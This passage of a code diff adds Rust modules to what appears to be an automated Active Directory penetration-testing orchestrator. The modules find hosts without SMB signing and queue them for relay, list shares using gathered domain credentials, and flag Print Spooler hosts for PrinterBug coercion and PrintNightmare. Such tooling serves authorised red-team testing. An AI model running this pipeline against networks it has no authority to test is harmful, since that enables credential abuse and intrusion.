attacks. +//! +//! Pattern: mirrors `auto_mssql_detection` — scan host list, publish vulns. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::StateInner; + +/// Work item for SMB signing detection. +struct SmbSigningWork { + ip: String, + hostname: String, + domain: String, +} + +fn collect_smb_signing_work(state: &StateInner) -> Vec { + state + .hosts + .iter() + .filter(|h| { + // Non-DC hosts with SMB (port 445) likely have signing disabled. + // DCs enforce signing:True; member servers default to signing not required. + !h.is_dc + && !h.hostname.is_empty() + && !state + .discovered_vulnerabilities + .contains_key(&format!("smb_signing_{}", h.ip.replace('.', "_"))) + }) + .map(|h| { + let domain = h + .hostname + .find('.') + .map(|i| h.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + SmbSigningWork { + ip: h.ip.clone(), + hostname: h.hostname.clone(), + domain, + } + }) + .collect() +} + +/// Scans discovered hosts for SMB signing disabled (non-DC Windows hosts). +/// DCs enforce signing; member servers typically do not. +/// Interval: 30s. +pub async fn auto_smb_signing_detection( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("smb_signing_disabled") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_smb_signing_work(&state) + }; + + for item in work { + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("smb_signing_{}", item.ip.replace('.', "_")), + vuln_type: "smb_signing_disabled".to_string(), + target: item.ip.clone(), + discovered_by: "auto_smb_signing_detection".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.ip)); + d.insert("ip".to_string(), json!(item.ip)); + if !item.hostname.is_empty() { + d.insert("hostname".to_string(), json!(item.hostname)); + } + if !item.domain.is_empty() { + d.insert("domain".to_string(), json!(item.domain)); + } + d + }, + recommended_agent: "coercion".to_string(), + priority: dispatcher.effective_priority("smb_signing_disabled"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!(ip = %item.ip, hostname = %item.hostname, "SMB signing disabled — vulnerability queued for relay"); + } + Ok(false) => {} // already exists + Err(e) => { + warn!(err = %e, ip = %item.ip, "Failed to publish SMB signing vulnerability") + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + #[test] + fn vuln_id_format() { + let ip = "192.168.58.22"; + let vuln_id = format!("smb_signing_{}", ip.replace('.', "_")); + assert_eq!(vuln_id, "smb_signing_192_168_58_22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_dc_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_dc_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_empty_hostname_skipped() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "", false)); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_already_discovered_vuln_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + // Simulate existing vulnerability + state.discovered_vulnerabilities.insert( + "smb_signing_192_168_58_22".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "smb_signing_192_168_58_22".into(), + vuln_type: "smb_signing_disabled".into(), + target: "192.168.58.22".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + recommended_agent: "coercion".into(), + priority: 5, + }, + ); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_hosts_mixed_dc_and_member() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.22")); + assert!(ips.contains(&"192.168.58.23")); + assert!(!ips.contains(&"192.168.58.10")); + } + + #[test] + fn collect_host_without_fqdn_gets_empty_domain() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "srv01", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_skips_vuln_keeps_clean() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local", false)); + // Only 192.168.58.22 has existing vuln + state.discovered_vulnerabilities.insert( + "smb_signing_192_168_58_22".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "smb_signing_192_168_58_22".into(), + vuln_type: "smb_signing_disabled".into(), + target: "192.168.58.22".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + recommended_agent: "coercion".into(), + priority: 5, + }, + ); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ip, "192.168.58.23"); + } +} diff --git a/ares-cli/src/orchestrator/automation/smbclient_enum.rs b/ares-cli/src/orchestrator/automation/smbclient_enum.rs new file mode 100644 index 00000000..3379d0dc --- /dev/null +++ b/ares-cli/src/orchestrator/automation/smbclient_enum.rs @@ -0,0 +1,745 @@ +//! auto_smbclient_enum -- authenticated SMB share listing per domain. +//! +//! Complements auto_share_enumeration by using authenticated sessions to +//! discover shares that require credentials. Uses smbclient or netexec +//! to list shares on all known hosts. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SMB enumeration work items from current state. +/// +/// Pure logic extracted from the async loop so it can be unit-tested +/// without a Dispatcher or runtime. +fn collect_smbclient_work(state: &crate::orchestrator::state::StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Check if host has SMB + let has_smb = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + if !has_smb { + continue; + } + + let dedup_key = format!("smb_auth_enum:{}", host.ip); + if state.is_processed(DEDUP_SMBCLIENT_ENUM, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_string()) + .unwrap_or_default(); + + // Pick a credential for this domain + let cred = match state + .credentials + .iter() + .find(|c| { + !domain.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(SmbEnumWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dispatches authenticated SMB share enumeration per host. +/// Interval: 45s. +pub async fn auto_smbclient_enum(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("smbclient_enum") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + let items = collect_smbclient_work(&state); + if items.is_empty() { + continue; + } + items + }; + + for item in work { + let payload = json!({ + "technique": "authenticated_share_enumeration", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("smbclient_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.target_ip, + "Authenticated SMB share enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SMBCLIENT_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SMBCLIENT_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.target_ip, "SMB auth enum deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.target_ip, "Failed to dispatch SMB auth enum"); + } + } + } + } +} + +struct SmbEnumWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::SharedState; + + /// Helper: create a credential for tests. + fn make_cred(user: &str, pass: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{user}"), + username: user.into(), + password: pass.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + /// Helper: create a host with given services. + fn make_host(ip: &str, hostname: &str, services: Vec<&str>) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: vec![], + services: services.into_iter().map(String::from).collect(), + is_dc: false, + owned: false, + } + } + + // ---- collect_smbclient_work tests ---- + + #[tokio::test] + async fn collect_empty_state_returns_nothing() { + let shared = SharedState::new("op-test".into()); + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_smb_hosts_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "web01.contoso.local", + vec!["80/tcp http", "443/tcp https"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_single_host_single_cred() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.10"); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "smb_auth_enum:192.168.58.10"); + } + + #[tokio::test] + async fn collect_multiple_hosts() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb", "80/tcp http"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(ips.contains(&"192.168.58.20")); + } + + #[tokio::test] + async fn collect_dedup_skips_already_processed() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[tokio::test] + async fn collect_prefers_same_domain_credential() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_cred("con_user", "Con123!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "con_user"); + } + + #[tokio::test] + async fn collect_falls_back_to_any_credential_when_no_domain_match() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fab_user"); + } + + #[tokio::test] + async fn collect_skips_empty_password_credentials() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "", "contoso.local")); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_empty_password_falls_back() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "", "contoso.local")); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fab_user"); + } + + #[tokio::test] + async fn collect_bare_hostname_empty_domain() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state + .hosts + .push(make_host("192.168.58.10", "srv01", vec!["445/tcp smb"])); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_cifs_service_detected() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "nas01.contoso.local", + vec!["cifs file share"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_case_insensitive_domain_matching() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.CONTOSO.LOCAL", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "CONTOSO.LOCAL"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_mixed_smb_and_non_smb_hosts() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds", "88/tcp kerberos"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "web01.contoso.local", + vec!["80/tcp http", "443/tcp https"], + )); + state.hosts.push(make_host( + "192.168.58.30", + "sql01.contoso.local", + vec!["1433/tcp mssql", "445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(!ips.contains(&"192.168.58.20")); + assert!(ips.contains(&"192.168.58.30")); + } + + #[tokio::test] + async fn collect_all_deduped_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into()); + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.20".into()); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_cross_domain_hosts_get_correct_creds() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "dc02.fabrikam.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("con_admin", "ConPass!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_cred("fab_admin", "FabPass!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + + let contoso_work = work + .iter() + .find(|w| w.target_ip == "192.168.58.10") + .unwrap(); + assert_eq!(contoso_work.credential.username, "con_admin"); + + let fabrikam_work = work + .iter() + .find(|w| w.target_ip == "192.168.58.20") + .unwrap(); + assert_eq!(fabrikam_work.credential.username, "fab_admin"); + } + + #[tokio::test] + async fn collect_only_empty_password_creds_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("user1", "", "contoso.local")); + state + .credentials + .push(make_cred("user2", "", "fabrikam.local")); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_host_with_empty_services() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", vec![])); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + // ---- original tests ---- + + #[test] + fn dedup_key_format() { + let key = format!("smb_auth_enum:{}", "192.168.58.10"); + assert_eq!(key, "smb_auth_enum:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SMBCLIENT_ENUM, "smbclient_enum"); + } + + #[test] + fn smb_service_detection() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "80/tcp http".to_string(), + ]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn smb_service_detection_by_name() { + let services = ["microsoft-ds smb".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn no_smb_service() { + let services = [ + "3389/tcp ms-wbt-server".to_string(), + "80/tcp http".to_string(), + ]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(!has_smb); + } + + #[test] + fn domain_from_hostname_preserves_case() { + // smbclient_enum uses to_string() not to_lowercase() for domain + let hostname = "srv01.CONTOSO.LOCAL"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default(); + assert_eq!(domain, "CONTOSO.LOCAL"); + } + + #[test] + fn smb_service_detection_cifs() { + let services = ["cifs share".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn smb_enum_payload_structure() { + let payload = serde_json::json!({ + "technique": "authenticated_share_enumeration", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "authenticated_share_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn credential_domain_matching_case_insensitive() { + let domain = "contoso.local"; + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!(cred_domain.to_lowercase(), domain.to_lowercase()); + } + + #[test] + fn credential_domain_matching_empty_skips() { + let domain = "".to_string(); + let cred_domain = "contoso.local"; + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase(); + assert!(!matches); + } + + #[test] + fn smb_enum_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = SmbEnumWork { + dedup_key: "smb_auth_enum:192.168.58.22".into(), + target_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + assert_eq!(work.target_ip, "192.168.58.22"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn empty_services_no_smb() { + let services: Vec = vec![]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(!has_smb); + } +} diff --git a/ares-cli/src/orchestrator/automation/spooler_check.rs b/ares-cli/src/orchestrator/automation/spooler_check.rs new file mode 100644 index 00000000..4815cfb2 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/spooler_check.rs @@ -0,0 +1,376 @@ +//! auto_spooler_check -- detect Print Spooler service on discovered hosts. +//! +//! The Print Spooler service (MS-RPRN) is a common coercion vector: if running, +//! PrinterBug (SpoolSample) can force the machine to authenticate to an attacker +//! listener. It's also a prerequisite for PrintNightmare (CVE-2021-1675). +//! +//! This is a recon bridge: it dispatches a check per host and registers +//! `spooler_enabled` vulnerabilities that downstream coercion/CVE modules target. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_spooler_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + let dedup_key = format!("spooler:{}", host.ip); + if state.is_processed(DEDUP_SPOOLER_CHECK, &dedup_key) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(SpoolerWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Checks discovered hosts for Print Spooler service availability. +/// Interval: 45s. +pub async fn auto_spooler_check(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("spooler_check") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_spooler_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "spooler_check", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("spooler_check"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "Print Spooler check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SPOOLER_CHECK, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SPOOLER_CHECK, &item.dedup_key) + .await; + + // Register spooler_enabled vulnerability proactively so it + // appears in reports. The agent's report_finding callback + // only logs — this ensures the finding is durable. + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("spooler_{}", item.target_ip.replace('.', "_")), + vuln_type: "spooler_enabled".to_string(), + target: item.target_ip.clone(), + discovered_by: "auto_spooler_check".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.target_ip)); + d.insert("hostname".to_string(), json!(item.hostname)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert( + "description".to_string(), + json!("Print Spooler service (MS-RPRN) is running. Enables PrinterBug coercion and is a prerequisite for PrintNightmare (CVE-2021-1675)."), + ); + d + }, + recommended_agent: "privesc".to_string(), + priority: dispatcher.effective_priority("spooler_check"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + target = %item.target_ip, + hostname = %item.hostname, + "Print Spooler enabled — vulnerability registered" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to publish spooler vulnerability"); + } + } + } + Ok(None) => { + debug!(target = %item.target_ip, "Spooler check deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch spooler check"); + } + } + } + } +} + +struct SpoolerWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("spooler:{}", "192.168.58.22"); + assert_eq!(key, "spooler:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SPOOLER_CHECK, "spooler_check"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn 